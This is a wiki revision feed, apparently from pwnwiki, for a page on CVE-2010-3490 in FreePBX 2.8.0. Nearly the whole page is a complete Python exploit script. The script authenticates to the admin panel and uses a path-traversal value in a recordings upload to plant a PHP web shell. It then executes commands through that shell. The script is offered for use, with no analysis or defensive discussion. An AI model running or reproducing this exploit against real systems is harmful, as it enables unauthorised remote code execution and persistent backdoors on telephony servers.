https://pwnwiki.com/index.php?action=history&feed=atom&title=CVE-2010-3490_FreePBX_2.8.0%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E5%89%B5%E5%BB%BA%E6%BC%8F%E6%B4%9E CVE-2010-3490 FreePBX 2.8.0任意文件創建漏洞 - Revision history 2026-04-10T16:15:57Z Revision history for this page on the wiki MediaWiki 1.35.1 https://pwnwiki.com/index.php?title=CVE-2010-3490_FreePBX_2.8.0%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E5%89%B5%E5%BB%BA%E6%BC%8F%E6%B4%9E&diff=911&oldid=prev Pwnwiki: Created page with "==EXP== <pre> import requests import random import string import sys # Original advisory : http://www.exploit-db.com/exploits/15098/ print("devloop exploit for FreePBX <=..." 2021-04-03T01:45:56Z <p>Created page with &quot;==EXP== &lt;pre&gt; import requests import random import string import sys # Original advisory : http://www.exploit-db.com/exploits/15098/ print(&quot;devloop exploit for FreePBX &lt;=...&quot;</p> <p><b>New page</b></p><div>==EXP==<br /> &lt;pre&gt;<br /> import requests<br /> import random<br /> import string<br /> import sys<br /> <br /> # Original advisory : http://www.exploit-db.com/exploits/15098/<br /> <br /> print(&quot;devloop exploit for FreePBX &lt;= 2.8.0 (CVE-2010-3490)&quot;)<br /> if len(sys.argv) != 4:<br /> print(&quot;Usage: {0} &lt;url_to_freepbx_admin_directory&gt; &lt;username&gt; &lt;password&gt;&quot;)<br /> sys.exit()<br /> <br /> BASE = sys.argv[1]<br /> USER = sys.argv[2]<br /> PASS = sys.argv[3]<br /> KEYW = &quot;devloop&quot;<br /> <br /> if not BASE.endswith(&quot;/&quot;):<br /> BASE += &quot;/&quot;<br /> <br /> sess = requests.session()<br /> creds = (USER, PASS)<br /> <br /> r = sess.get(BASE + &quot;config.php&quot;, auth=creds)<br /> if &quot;Logged in:&quot; in r.content:<br /> print(&quot;[+] Connection successful&quot;)<br /> else:<br /> print(&quot;[!] Unable to login... check credentials and url&quot;)<br /> sys.exit()<br /> <br /> data = {<br /> 'action': 'recorded',<br /> 'display': 'recordings',<br /> 'usersnum': '../../../../../var/www/html/admin/{0}'.format(KEYW),<br /> 'rname': &quot;&quot;.join([random.choice(string.hexdigits) for _ in xrange(10)]),<br /> 'Submit': 'Save'<br /> }<br /> <br /> content = &quot;&lt;?php system($_GET['cmd']); ?&gt;&quot;<br /> files = {<br /> 'ivrfile': ('backdoor.php', content, 'application/octet-stream')<br /> }<br /> hdrs = {&quot;referer&quot;: BASE + &quot;config.php?type=setup&amp;display=recordings&quot;}<br /> <br /> r = sess.post(BASE + &quot;config.php?type=setup&amp;display=recordings&quot;,<br /> data=data,<br /> files=files,<br /> auth=creds,<br /> headers=hdrs)<br /> <br /> print(&quot;[i] Testing shell at address {0}{1}-ivrrecording.php&quot;.format(BASE, KEYW))<br /> r = requests.get(BASE + KEYW + &quot;-ivrrecording.php?cmd=uname+-a&quot;, auth=creds)<br /> if r.status_code != 200:<br /> print(&quot;[-] Received HTTP code {0} for this url&quot;.format(r.status_code))<br /> else:<br /> print(&quot;HTTP 200 OK&quot;)<br /> print r.content<br /> <br /> &lt;/pre&gt;</div> Pwnwiki